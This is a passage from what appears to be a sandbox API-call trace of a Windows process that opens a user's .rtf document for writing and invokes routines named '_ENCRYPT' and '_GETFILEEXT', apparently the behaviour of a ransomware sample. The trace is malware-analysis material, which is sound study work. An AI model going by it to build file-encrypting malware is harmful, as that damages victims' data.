Size=0x10001) returned 0x935008 [0035.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf", cchWideChar=98, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0035.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x62) returned 0x7c10a8 [0035.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf", cchWideChar=98, lpMultiByteStr=0x7c10a8, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf", lpUsedDefaultChar=0x0) returned 98 [0035.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0035.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.056] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\mtggv.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0035.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0035.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0035.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0035.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0035.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=98, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0035.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc4) returned 0x7c5448 [0035.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=98, lpWideCharStr=0x7c5448, cchWideChar=98 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf") returned 98 [0035.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0035.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791190 [0035.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0035.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0035.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0035.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0035.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0035.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0035.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0035.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0035.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0035.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0035.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0035.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0035.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0035.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0035.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0035.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0035.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0035.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0035.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.058] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0035.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0035.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0035.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0035.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0035.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.060] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0035.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0035.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0035.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0035.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0035.060] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0035.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0035.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0035.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0035.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0035.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0035.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0035.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0035.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0035.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0035.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0035.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0035.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0035.061] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0035.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0035.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.061] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0035.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccb8 [0035.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ccb8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0035.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.062] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0035.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0035.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0035.062] CloseHandle (hObject=0x140) returned 1 [0035.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0035.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0035.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0035.062] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0035.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0035.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.062] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0035.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0035.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0035.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0035.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0035.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0035.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.063] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0035.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0035.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.063] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.063] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0035.063] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.063] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0035.063] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0035.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, 